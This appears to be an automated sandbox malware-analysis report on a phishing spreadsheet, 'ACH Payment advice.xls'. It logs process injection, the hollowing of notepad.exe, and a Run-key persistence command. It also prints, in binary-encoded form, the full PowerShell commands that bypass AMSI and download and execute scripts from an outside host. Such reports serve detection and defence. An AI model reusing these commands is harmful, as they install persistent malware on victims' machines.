parent_process	excel.exe	martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $gf=(00100100,01110111,01100101,00110010,00110010,00111101,00100111,00101000,01001110,01100101,01110111,00101101,01001111,01100010,01101010,01100101,00100111,00100000,00101011,00100000,00100111,01100011,01110100,00100000,01001110,01100101,01110100,00101110,01010111,01100101,00100111,00111011,00100000,00100100,01100010,00110100,01100100,01100110,00111101,00100111,01100010,01000011,01101100,00100111,00100000,00101011,00100000,00100111,01101001,01100101,01101110,01110100,00101001,00101110,01000100,01101111,01110111,01101110,01101100,01101111,00100111,00111011,00100000,00100100,01100011,00110011,00111101,00100111,01100001,01100100,01000110,01101001,01101100,01100101,00101000,00100111,00100111,01101000,01110100,01110100,01110000,00111010,00101111,00101111,01100100,01110010,01100101,01100001,01101101,01110111,01100001,01110100,01100011,01101000,01100101,01110110,01100101,01101110,01110100,00101110,01100011,01101111,01101101,00101111,00101110,01110111,01100101,01101100,01101100,00101101,01101011,01101110,01101111,01110111,01101110,00101111,01110000,01101011,01101001,00101101,01110110,01100001,01101100,01101001,01100100,01100001,01110100,01101001,01101111,01101110,00101111,01010000,01110010,01101111,01110100,01100101,01100011,01110100,01100101,01100100,00100000,01000011,01101100,01101001,01100101,01101110,01110100,00101110,01101010,01110011,00100111,00100111,00101100,00100100,01100101,01101110,01110110,00111010,01110100,01100101,01101101,01110000,00101011,00100111,00100111,01011100,01101110,01101111,01110100,01100101,01110000,01100001,01100100,00101110,01101010,01110011,00100111,00100111,00101001,00100111,00111011,00100100,01010100,01000011,00111101,00100100,01110111,01100101,00110010,00110010,00101100,00100100,01100010,00110100,01100100,01100110,00101100,00100100,01100011,00110011,00100000,00101101,01001010,01101111,01101001,01101110,00100000,00100111,00100111,01111100,01001001,01000101,01011000,00111011,01110011,01110100,01100001,01110010,01110100,00101101,01110000,01110010,01101111,01100011,01100101,01110011,01110011,00101000,00100100,01100101,01101110,01110110,00111010,01110100,01100101,01101101,01110000,00101011,00100000,00100111,01011100,01101110,01101111,01110100,01100101,01110000,01100001,01100100,00101110,01101010,01110011,00100111,00101001) \| %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) };[system.String]::Join('', $gf)\|IEX
parent_process	powershell.exe	martian_process	C:\Windows\SysWOW64\notepad.exe

Resumed a suspended thread in a remote process potentially indicative of process injection (10 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2488 resumed a thread in remote process 2736
Process injection	Process 2960 resumed a thread in remote process 2180
Process injection	Process 2960 resumed a thread in remote process 2512
Process injection	Process 2960 resumed a thread in remote process 644
Process injection	Process 2180 resumed a thread in remote process 212
NtResumeThread Sept. 10, 2021, 8:58 a.m.	thread_handle: 0x0000061c suspend_count: 1 process_identifier: 2736	1	0	0
NtResumeThread Sept. 10, 2021, 8:58 a.m.	thread_handle: 0x00000314 suspend_count: 1 process_identifier: 2180	1	0	0
NtResumeThread Sept. 10, 2021, 8:58 a.m.	thread_handle: 0x00000318 suspend_count: 1 process_identifier: 2512	1	0	0
NtResumeThread Sept. 10, 2021, 8:58 a.m.	thread_handle: 0x00000320 suspend_count: 1 process_identifier: 644	1	0	0
NtResumeThread Sept. 10, 2021, 8:59 a.m.	thread_handle: 0x00000568 suspend_count: 1 process_identifier: 212	1	0	0

Generates some ICMP traffic

Executed a process and injected code into it, probably while unpacking (37 events)

Time & API	Arguments	Status	Return
NtResumeThread Sept. 10, 2021, 8:58 a.m.	thread_handle: 0x00000578 suspend_count: 1 process_identifier: 2488	1	0
CreateProcessInternalW Sept. 10, 2021, 8:58 a.m.	thread_identifier: 2740 thread_handle: 0x0000061c process_identifier: 2736 current_directory: C:\Users\test22\Documents filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $gf=(00100100,01110111,01100101,00110010,00110010,00111101,00100111,00101000,01001110,01100101,01110111,00101101,01001111,01100010,01101010,01100101,00100111,00100000,00101011,00100000,00100111,01100011,01110100,00100000,01001110,01100101,01110100,00101110,01010111,01100101,00100111,00111011,00100000,00100100,01100010,00110100,01100100,01100110,00111101,00100111,01100010,01000011,01101100,00100111,00100000,00101011,00100000,00100111,01101001,01100101,01101110,01110100,00101001,00101110,01000100,01101111,01110111,01101110,01101100,01101111,00100111,00111011,00100000,00100100,01100011,00110011,00111101,00100111,01100001,01100100,01000110,01101001,01101100,01100101,00101000,00100111,00100111,01101000,01110100,01110100,01110000,00111010,00101111,00101111,01100100,01110010,01100101,01100001,01101101,01110111,01100001,01110100,01100011,01101000,01100101,01110110,01100101,01101110,01110100,00101110,01100011,01101111,01101101,00101111,00101110,01110111,01100101,01101100,01101100,00101101,01101011,01101110,01101111,01110111,01101110,00101111,01110000,01101011,01101001,00101101,01110110,01100001,01101100,01101001,01100100,01100001,01110100,01101001,01101111,01101110,00101111,01010000,01110010,01101111,01110100,01100101,01100011,01110100,01100101,01100100,00100000,01000011,01101100,01101001,01100101,01101110,01110100,00101110,01101010,01110011,00100111,00100111,00101100,00100100,01100101,01101110,01110110,00111010,01110100,01100101,01101101,01110000,00101011,00100111,00100111,01011100,01101110,01101111,01110100,01100101,01110000,01100001,01100100,00101110,01101010,01110011,00100111,00100111,00101001,00100111,00111011,00100100,01010100,01000011,00111101,00100100,01110111,01100101,00110010,00110010,00101100,00100100,01100010,00110100,01100100,01100110,00101100,00100100,01100011,00110011,00100000,00101101,01001010,01101111,01101001,01101110,00100000,00100111,00100111,01111100,01001001,01000101,01011000,00111011,01110011,01110100,01100001,01110010,01110100,00101101,01110000,01110010,01101111,01100011,01100101,01110011,01110011,00101000,00100100,01100101,01101110,01110110,00111010,01110100,01100101,01101101,01110000,00101011,00100000,00100111,01011100,01101110,01101111,01110100,01100101,01110000,01100001,01100100,00101110,01101010,01110011,00100111,00101001) \| %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) };[system.String]::Join('', $gf)\|IEX filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000620	1	1
NtResumeThread Sept. 10, 2021, 8:58 a.m.	thread_handle: 0x0000061c suspend_count: 1 process_identifier: 2736	1	0
NtResumeThread Sept. 10, 2021, 8:58 a.m.	thread_handle: 0x0000029c suspend_count: 1 process_identifier: 2736	1	0
NtResumeThread Sept. 10, 2021, 8:58 a.m.	thread_handle: 0x000002f0 suspend_count: 1 process_identifier: 2736	1	0
NtResumeThread Sept. 10, 2021, 8:58 a.m.	thread_handle: 0x0000043c suspend_count: 1 process_identifier: 2736	1	0
NtResumeThread Sept. 10, 2021, 8:58 a.m.	thread_handle: 0x000004e8 suspend_count: 1 process_identifier: 2736	1	0
NtResumeThread Sept. 10, 2021, 8:58 a.m.	thread_handle: 0x00000530 suspend_count: 1 process_identifier: 2736	1	0
CreateProcessInternalW Sept. 10, 2021, 8:58 a.m.	thread_identifier: 3008 thread_handle: 0x00000604 process_identifier: 2960 current_directory: C:\Users\test22\Documents filepath: C:\Windows\System32\wscript.exe track: 1 command_line: "C:\Windows\System32\WScript.exe" "C:\Users\test22\AppData\Local\Temp\notepad.js" filepath_r: C:\Windows\System32\WScript.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000005f8	1	1
NtResumeThread Sept. 10, 2021, 8:58 a.m.	thread_handle: 0x00000620 suspend_count: 1 process_identifier: 2736	1	0
CreateProcessInternalW Sept. 10, 2021, 8:58 a.m.	thread_identifier: 2304 thread_handle: 0x00000314 process_identifier: 2180 current_directory: C:\Users\test22\Documents filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $gf=(00100111,01011011,01110110,01101111,01101001,01100100,00100111,00100000,00101011,00100000,00100111,01011101,00100000,01011011,01010011,01111001,01110011,01110100,00100111,00100000,00101011,00100000,00100111,01100101,01101101,00101110,01010010,01100101,01100110,01101100,01100101,00100111,00100000,00101011,00100000,00100111,01100011,01110100,01101001,01101111,01101110,00101110,01000001,01110011,01110011,01100101,00100111,00100000,00101011,00100000,00100111,01101101,01100010,01101100,01111001,01011101,00111010,00111010,01001100,01101111,01100001,01100100,01010111,01101001,00100111,00100000,00101011,00100000,00100111,01110100,01101000,01010000,01100001,01110010,01110100,01101001,01100001,01101100,01001110,01100001,01101101,01100101,00101000,00100111,00100111,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00100111,00100111,00101001,00100111,01111100,01001001,01000101,01011000,00111011,00100100,01110100,00110101,00110110,01100110,01100111,00100000,00111101,00100000,01011011,01000101,01101110,01110101,01101101,01011101,00111010,00111010,01010100,01101111,01001111,01100010,01101010,01100101,01100011,01110100,00101000,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,01010100,01111001,01110000,01100101,01011101,00101100,00100000,00110011,00110000,00110111,00110010,00101001,00111011,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01110010,01110110,01101001,01100011,01100101,01010000,01101111,01101001,01101110,01110100,01001101,01100001,01101110,01100001,01100111,01100101,01110010,01011101,00111010,00111010,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,00100000,00111101,00100000,00100100,01110100,00110101,00110110,01100110,01100111,00111011,00100100,01111001,01110010,01110100,01100111,00111101,01011011,01010010,01100101,01100110,01011101,00101110,01000001,01110011,01110011,01100101,01101101,01100010,01101100,01111001,00101110,01000111,01100101,01110100,01010100,01111001,01110000,01100101,00101000,00100111,01010011,01111001,00100111,00101011,00100111,01110011,01110100,01100101,01101101,00101110,00100111,00101011,00100111,01001101,01100001,01101110,01100001,00100111,00101011,00100111,01100111,01100101,01101101,00100111,00101011,00100111,01100101,01101110,01110100,00100111,00101011,00100111,00101110,01000001,01110101,01110100,01101111,01101101,00100111,00101011,00100111,01100001,01110100,01101001,01101111,00100111,00101011,00100111,01101110,00101110,01000001,00100111,00101011,00100111,01101101,00100111,00101011,00100111,01110011,01101001,00100111,00101011,00100111,01010101,01110100,01101001,01101100,01110011,00100111,00101001,00101110,01000111,01100101,01110100,01000110,01101001,01100101,01101100,01100100,00101000,00100111,01100001,00100111,00101011,00100111,01101101,01110011,00100111,00101011,00100111,01101001,01001001,00100111,00101011,00100111,01101110,01101001,01110100,01000110,01100001,00100111,00101011,00100111,01101001,01101100,01100101,01100100,00100111,00101100,00100111,01001110,01101111,01101110,00100101,01011110,00100111,00101110,01110010,01100101,01110000,01101100,01100001,01100011,01100101,00101000,00100111,00100101,01011110,00100111,00101100,00100111,01010000,01110101,01100010,00100111,00101001,00101011,00100111,01101100,01101001,01100011,00101100,01010011,00100111,00101011,00100111,01110100,01100001,01110100,01101001,01100011,00100111,00101001,00111011,00100100,01111001,01110010,01110100,01100111,00101110,01010011,01100101,01110100,01010110,01100001,01101100,01110101,01100101,00101000,00100100,01101110,01110101,01101100,01101100,00101100,00100100,01110100,01110010,01110101,01100101,00101001,00111011,01100100,01101111,00100000,01111011,00100100,01110000,01101001,01101110,01100111,00100000,00111101,00100000,01110100,01100101,01110011,01110100,00101101,01100011,01101111,01101110,01101110,01100101,01100011,01110100,01101001,01101111,01101110,00100000,00101101,01100011,01101111,01101101,01110000,00100000,01100111,01101111,01101111,01100111,01101100,01100101,00101110,01100011,01101111,01101101,00100000,00101101,01100011,01101111,01110101,01101110,01110100,00100000,00110001,00100000,00101101,01010001,01110101,01101001,01100101,01110100,01111101,00100000,01110101,01101110,01110100,01101001,01101100,00100000,00101000,00100100,01110000,01101001,01101110,01100111,00101001,00111011,00100100,01110100,01110100,01111001,00111101,00100111,00101000,01001110,01100101,01110111,00101101,00100111,00101011,00100111,01001111,01100010,01101010,01100101,00100111,00101011,00100111,01100011,01110100,00100000,01001110,01100101,00100111,00101011,00100111,01110100,00101110,01010111,01100101,00100111,00101011,00100111,01100010,01000011,01101100,01101001,00100111,00101011,00100111,01100101,01101110,01110100,00101001,00100111,01111100,01001001,01100000,01000101,01100000,01011000,00111011,00100100,01101101,01110110,00111101,00100000,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01001001,01101110,01110100,01100101,01110010,01100001,01100011,01110100,01101001,01101111,01101110,01011101,00111010,00111010,01000011,01100001,01101100,01101100,01000010,01111001,01101110,01100001,01101101,01100101,00101000,00100100,01110100,01110100,01111001,00101100,00100111,01000100,01101111,01110111,01101110,01101100,01101111,01100001,01100100,01010011,01110100,01110010,01101001,01101110,01100111,00100111,00101100,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01000011,01100001,01101100,01101100,01010100,01111001,01110000,01100101,01011101,00111010,00111010,01001101,01100101,01110100,01101000,01101111,01100100,00101100,00100111,01101000,01110100,01110100,01110000,00111010,00101111,00101111,01100100,01110010,01100101,01100001,01101101,01110111,01100001,01110100,01100011,01101000,01100101,01110110,01100101,01101110,01110100,00101110,01100011,01101111,01101101,00101111,00101110,01110111,01100101,01101100,01101100,00101101,01101011,01101110,01101111,01110111,01101110,00101111,01110000,01101011,01101001,00101101,01110110,01100001,01101100,01101001,01100100,01100001,01110100,01101001,01101111,01101110,00101111,01000001,01110100,01110100,01100001,01100011,01101011,00101110,01101010,01110000,01100111,00100111,00101001,00111011,00100100,01110010,00110111,00111000,01100110,01100100,00110000,00110000,00110000,01110011,01100100,00111101,00100000,00100100,01101101,01110110,00100000,00101101,01110011,01110000,01101100,01101001,01110100,00100000,00100111,00100101,00100111,00100000,01111100,01000110,01101111,01110010,01000101,01100001,01100011,01101000,00101101,01001111,01100010,01101010,01100101,01100011,01110100,00100000,01111011,01011011,01100011,01101000,01100001,01110010,01011101,01011011,01100010,01111001,01110100,01100101,01011101,00100010,00110000,01111000,00100100,01011111,00100010,01111101,00111011,00100100,01111001,00110101,01101010,01101000,00110110,00110010,01100100,01100110,00110000,00111101,00100000,01001001,01100000,01000101,01100000,01011000,00101000,00100100,01110010,00110111,00111000,01100110,01100100,00110000,00110000,00110000,01110011,01100100,00100000,00101101,01101010,01101111,01101001,01101110,00100000,00100111,00100111,00101001) \| %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) };I`E`X([system.String]::Join('', $gf)) filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000031c	1	1
NtResumeThread Sept. 10, 2021, 8:58 a.m.	thread_handle: 0x00000314 suspend_count: 1 process_identifier: 2180	1	0
CreateProcessInternalW Sept. 10, 2021, 8:58 a.m.	thread_identifier: 2508 thread_handle: 0x00000318 process_identifier: 2512 current_directory: C:\Users\test22\Documents filepath: C:\Windows\System32\cmd.exe track: 1 command_line: "C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "lol" /t REG_SZ /F /D "C:\Users\test22\AppData\Roaming\notepad.js" filepath_r: C:\Windows\System32\cmd.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000032c	1	1
NtResumeThread Sept. 10, 2021, 8:58 a.m.	thread_handle: 0x00000318 suspend_count: 1 process_identifier: 2512	1	0
CreateProcessInternalW Sept. 10, 2021, 8:58 a.m.	thread_identifier: 300 thread_handle: 0x00000320 process_identifier: 644 current_directory: C:\Users\test22\Documents filepath: C:\Windows\System32\cmd.exe track: 1 command_line: "C:\Windows\System32\cmd.exe" /c copy "C:\Users\test22\AppData\Local\Temp\notepad.js" "C:\Users\test22\AppData\Roaming\" /Y filepath_r: C:\Windows\System32\cmd.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000330	1	1
NtResumeThread Sept. 10, 2021, 8:58 a.m.	thread_handle: 0x00000320 suspend_count: 1 process_identifier: 644	1	0
NtResumeThread Sept. 10, 2021, 8:58 a.m.	thread_handle: 0x000002ac suspend_count: 1 process_identifier: 2180	1	0
NtResumeThread Sept. 10, 2021, 8:58 a.m.	thread_handle: 0x00000300 suspend_count: 1 process_identifier: 2180	1	0
NtResumeThread Sept. 10, 2021, 8:58 a.m.	thread_handle: 0x0000044c suspend_count: 1 process_identifier: 2180	1	0
NtResumeThread Sept. 10, 2021, 8:58 a.m.	thread_handle: 0x00000594 suspend_count: 1 process_identifier: 2180	1	0
NtResumeThread Sept. 10, 2021, 8:59 a.m.	thread_handle: 0x00000208 suspend_count: 1 process_identifier: 2180	1	0
NtResumeThread Sept. 10, 2021, 8:59 a.m.	thread_handle: 0x000004b0 suspend_count: 1 process_identifier: 2180	1	0
CreateProcessInternalW Sept. 10, 2021, 8:59 a.m.	thread_identifier: 184 thread_handle: 0x00000568 process_identifier: 212 current_directory: filepath: C:\Windows\SysWOW64\notepad.exe track: 1 command_line: filepath_r: C:\WINDOWS\syswow64\notepad.exe stack_pivoted: 0 creation_flags: 4 (CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x000004b8	1	1
NtGetContextThread Sept. 10, 2021, 8:59 a.m.	thread_handle: 0x00000568	1	0
NtAllocateVirtualMemory Sept. 10, 2021, 8:59 a.m.	process_identifier: 212 region_size: 495616 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000004b8	1	0
WriteProcessMemory Sept. 10, 2021, 8:59 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $ªB0îâ,cîâ,cîâ,cZ~Ýcüâ,cZ~ßcOâ,cZ~Þcðâ,cç¨cïâ,cpBëcìâ,cÕ¼/bôâ,cÕ¼)bÔâ,cÕ¼(bÌâ,cç¿cûâ,cîâ-cñã,cy¼%b±â,c\|¼Ócïâ,cy¼.bïâ,cRichîâ,cPELMSaà l÷0@ÜTKP80l8Älhl@0t.text¶ `.rdatao0p@@.data\= @À.tls à@À.gfids0ð@@.rsrcTKL¢@@.reloc8P:î@B base_address: 0x00400000 process_identifier: 212 process_handle: 0x000004b8	1	1
WriteProcessMemory Sept. 10, 2021, 8:59 a.m.	buffer: base_address: 0x00401000 process_identifier: 212 process_handle: 0x000004b8	1	1
WriteProcessMemory Sept. 10, 2021, 8:59 a.m.	buffer: base_address: 0x00453000 process_identifier: 212 process_handle: 0x000004b8	1	1
WriteProcessMemory Sept. 10, 2021, 8:59 a.m.	buffer: ÿÿÿÿ±¿DNæ@»ÿÿÿÿ Copyright (c) by P.J. Plauger, licensed by Dinkumware, Ltd. ALL RIGHTS RESERVED.ÿÿÿÿ ´tE¸wE²tE..¡FL¶FL¶FL¶FL¶FL¶FL¶FL¶FL¶FL¶F¡FP¶FP¶FP¶FP¶FP¶FP¶FP¶F¡Fÿÿÿÿ¸wE¨¢F¨¢F¨¢F¨¢F¨¢F¡F8zE¸{EEè¡F§FCPSTPDT°¢Fð¢Fÿÿÿÿÿÿÿÿÿÿÿÿ ¤`y!¦ß¡¥àü@~ü¨Á£Ú£ þ@þµÁ£Ú£ þAþ¶Ï¢ä¢å¢è¢[þ@~¡þQQÚ^Ú _ÚjÚ2ÓØÞàù1~þ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ§Fþÿÿÿþÿÿÿu0Ï!tåa¾e¸Â¢z»^ âÈ¨346E.?AVtype_info@@46E.?AVbad_alloc@std@@46E.?AVbad_array_new_length@std@@46E.?AVlogic_error@std@@46E.?AVlength_error@std@@46E.?AVout_of_range@std@@46E.?AV_Facet_base@std@@46E.?AV_Locimp@locale@std@@46E.?AVfacet@locale@std@@46E.?AU_Crt_new_delete@std@@46E.?AVcodecvt_base@std@@46E.?AUctype_base@std@@46E.?AV?$ctype@D@std@@46E.?AV?$codecvt@DDU_Mbstatet@@@std@@46E.?AVbad_exception@std@@46E.H46E.?AVfailure@ios_base@std@@46E.?AVruntime_error@std@@46E.?AVsystem_error@std@@46E.?AVbad_cast@std@@46E.?AV_System_error@std@@46E.?AVexception@std@@ base_address: 0x0046a000 process_identifier: 212 process_handle: 0x000004b8	1	1
WriteProcessMemory Sept. 10, 2021, 8:59 a.m.	buffer: base_address: 0x0046e000 process_identifier: 212 process_handle: 0x000004b8	1	1
WriteProcessMemory Sept. 10, 2021, 8:59 a.m.	buffer: +ÔÔ?¤Ø¾Ø?Ù?)s?ÚuZ55g;Ù.~~Dñìð??m(À'ÆØØ®õÐûõÛÝÛÝÛ(jk¡iæÞ\F£ã¥w¡Ô(´öä¼éÙ b Er4NPNWN]TUZ[ äøää äö_^îØØäüûüû í9<8;ú` ¢§µ¶³´±²¯°¸ Y base_address: 0x0046f000 process_identifier: 212 process_handle: 0x000004b8	1	1
WriteProcessMemory Sept. 10, 2021, 8:59 a.m.	buffer: base_address: 0x00470000 process_identifier: 212 process_handle: 0x000004b8	1	1
WriteProcessMemory Sept. 10, 2021, 8:59 a.m.	buffer: base_address: 0x00475000 process_identifier: 212 process_handle: 0x000004b8	1	1
WriteProcessMemory Sept. 10, 2021, 8:59 a.m.	buffer: @ base_address: 0x7efde008 process_identifier: 212 process_handle: 0x000004b8	1	1
NtSetContextThread Sept. 10, 2021, 8:59 a.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4388716 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000568 process_identifier: 212	1	0
NtResumeThread Sept. 10, 2021, 8:59 a.m.	thread_handle: 0x00000568 suspend_count: 1 process_identifier: 212	1	0
CreateProcessInternalW Sept. 10, 2021, 8:58 a.m.	thread_identifier: 2648 thread_handle: 0x00000084 process_identifier: 2220 current_directory: C:\Users\test22\Documents filepath: C:\Windows\System32\reg.exe track: 1 command_line: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "lol" /t REG_SZ /F /D "C:\Users\test22\AppData\Roaming\notepad.js" filepath_r: C:\Windows\system32\reg.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000088	1	1

The processes excel.exe, wscript.exe wrote an executable file to disk which it then attempted to execute (3 events)

file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\SysWOW64\wscript.exe
file	C:\Windows\System32\cmd.exe

ACH Payment advice.xls

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All